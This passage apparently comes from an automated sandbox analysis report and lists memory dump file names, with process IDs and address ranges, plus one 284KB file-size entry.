                                                                                                                                                                                            • memory/5400-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5412-303-0x0000000000401480-mapping.dmp
                                                                                                                                                                                            • memory/5412-316-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                              Filesize

                                                                                                                                                                                              284KB

                                                                                                                                                                                            • memory/5428-339-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5504-369-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5524-359-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5536-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5588-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5604-361-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5616-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5656-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5856-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5924-357-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5964-363-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/5968-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/6032-348-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/6044-355-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/6068-338-0x0000000000000000-mapping.dmp
                                                                                                                                                                                            • memory/6120-352-0x0000000000000000-mapping.dmp